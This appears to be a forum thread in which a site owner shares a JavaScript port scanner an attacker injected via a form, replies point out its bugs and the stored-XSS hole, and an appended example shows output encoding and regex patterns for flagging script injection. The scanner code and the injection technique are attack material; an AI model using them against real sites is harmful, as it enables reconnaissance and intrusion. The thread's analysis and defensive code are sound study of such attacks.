Attacker


djp1988

Hi everyone, I had some smart arse trying to get some info from my site by posting javascript in a form, thought you guys may be interested in having a look:

<script>
function scanPort(callback,target, port, timeout){
  var timeout = (timeout == null)?100:timeout;
  var img = new Image();
  img.onerror = function () {
    if (!img) return;
    img = undefined;
    callback(target, port, 'open');
  };
  img.onload = img.onerror;
  img.src = 'http://' + target + ':' + port;
  setTimeout(function () {
    if (!img) return;
    img = undefined;
    callback(target, port, 'closed');
  }, timeout);
};
function record(ip,port,open){
  alert(ip+':'+port+' is '+open);
}
function scan(ip,portfrom,portto,timeout){
  for (i=portfrom;i=portto;i++){
    scanPort(record(),ip,i,timeout);
  }
}
scan('0.0.0.0',1,80,200);
</script>

The 0.0.0.0 was the site's IP.

The same person opened another account and inserted the following in a javascript tag:



The "hacker" is just trying to scare you.

The first script does nothing but go opening alert boxes that say "0.0.0.0:1 is open".

By the way, he made a mistake here and executed a function rather than reference it:

scanPort(record(),ip,i,timeout

The second thing you're showing doesn't actually do anything at all, it's just a series of random characters that might slightly resemble some form of JSON.

Are you allowing people to post Javascript on your page?


It would appear so, yes :)

I've gone through this and disabled it now. I made these scripts a few years ago... since then, I've been doing different projects and haven't really had time to go back and redo and improve older projects.

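The fix discussed in this thread (not letting submitted form content run as script) comes down to encoding user input when it is written into a page. The following is an added example, not part of the original posts: it HTML-encodes submitted values at output time and audits already-stored submissions for markup that was meant to execute. All function names and sample rows are constructed for illustration.

```javascript
// Added example: encode user-submitted values on output and audit stored rows.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

// Safe for HTML text and quoted-attribute contexts only. It is NOT enough
// inside <script>, <style>, or URL-valued attributes such as href/src.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Always build output from encoded values, never from the raw submission.
function renderComment(author, body) {
  return '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' +
         escapeHtml(body) + '</div>';
}

// Triage patterns for rows stored before encoding was in place.
// These are review hints (false positives are expected), not a filter.
const SUSPICIOUS = [
  { name: 'script-tag', re: /<\s*\/?\s*script\b/i },
  { name: 'event-handler', re: /<[^>]+\son[a-z]+\s*=/i },
  { name: 'javascript-url', re: /javascript\s*:/i },
  { name: 'hex-escape-run', re: /(?:\\x[0-9a-f]{2}){8,}/i },
];

function auditSubmission(value) {
  const text = String(value);
  return SUSPICIOUS.filter((p) => p.re.test(text)).map((p) => p.name);
}

function auditAll(rows) {
  return rows
    .map((r) => ({ id: r.id, flags: auditSubmission(r.body) }))
    .filter((r) => r.flags.length > 0);
}

// Constructed sample rows standing in for a table of stored form posts.
const stored = [
  { id: 1, body: 'Nice article, thanks!' },
  { id: 2, body: "<script>scan('0.0.0.0',1,80,200);</script>" },
  { id: 3, body: '\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69' },
  { id: 4, body: '<a href="#" onclick="track()">link</a>' },
];

console.log(auditAll(stored));
console.log(renderComment('guest', stored[1].body));
```

The audit only helps find old rows worth reviewing; it is the encoding at output that keeps submitted markup from executing in a visitor's browser.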
